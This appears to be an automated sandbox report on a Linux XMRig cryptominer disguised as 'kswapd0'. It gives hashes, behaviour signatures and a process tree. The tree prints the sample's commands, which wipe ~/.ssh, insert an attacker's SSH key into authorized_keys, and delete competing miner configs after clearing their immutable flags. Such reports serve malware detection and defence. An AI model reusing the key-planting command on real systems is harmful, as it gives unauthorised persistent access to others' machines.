Analysis

  • max time kernel
    600s
  • max time network
    545s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags
    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  • submitted
    15/04/2024, 16:01

General

  • Target

    .rsync/a/kswapd0

  • Size

    2.1MB

  • MD5

    8da798989b6e48fb211674b652119a8c

  • SHA1

    ffe36761ebc571f086d06e8a3b5cb3adc5ce8deb

  • SHA256

    8acfbcd3da37b25ae2f2d88115c4b1b05c75e2e9face918e3f21fa10cc3126b4

  • SHA512

    1859b99e1cfa246807d51cec8441b00d0a21251d46198a92b10e7bcf3a4d764a48ba54953da2d79cdbb2d9e29d95d2a6c86c2a34e0968409dbedf9baff807f3b

  • SSDEEP

    49152:XNcjlR90c88OeWSUiyLspBFLKb52pzTduYRSt4rxIugUWsfCfbws:9WPQheWvi9TKV29TdjxICWeCTws

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Attempts to change immutable files 2 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 45 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 23 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 6 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/.rsync/a/kswapd0
    /tmp/.rsync/a/kswapd0
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:1477
    • /bin/sh
      sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
      2⤵
        PID:1478
      • /bin/sh
        sh -c "chattr -ia ~/.xmrig.json;lockr -ia ~/.xmrig.json; rm -rf ~/.xmrig.json; chattr -ia ~/.config/xmrig.json; lockr -ia ~/.config/xmrig.json; rm -rf ~/.config/xmrig.json"
        2⤵
          PID:1482
          • /usr/bin/chattr
            chattr -ia "~/.xmrig.json"
            3⤵
            • Attempts to change immutable files
            PID:1483
          • /usr/bin/rm
            rm -rf "~/.xmrig.json"
            3⤵
              PID:1484
            • /usr/bin/chattr
              chattr -ia "~/.config/xmrig.json"
              3⤵
              • Attempts to change immutable files
              PID:1485
            • /usr/bin/rm
              rm -rf "~/.config/xmrig.json"
              3⤵
                PID:1486

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/.rsync/a/cert_key.pem

    Filesize

    1KB

    MD5

    f9ea8500b4befc772765e5711a8c4a6e

    SHA1

    0cef587824970c06cdf95cad8f58edcc1118d62e

    SHA256

    73d2b01c97ed035547824acd7870c299a6adedffa5eb1a47855362fa644c2a7c

    SHA512

    e66b0fb3a1b8511c921fd0b1bdcbecf08cfc939bd250043b1b7ca40af41474cb57d6e0e8309bc0869e545a53d93d1012a1aeee21cf8d7cf13530b2ce391920e3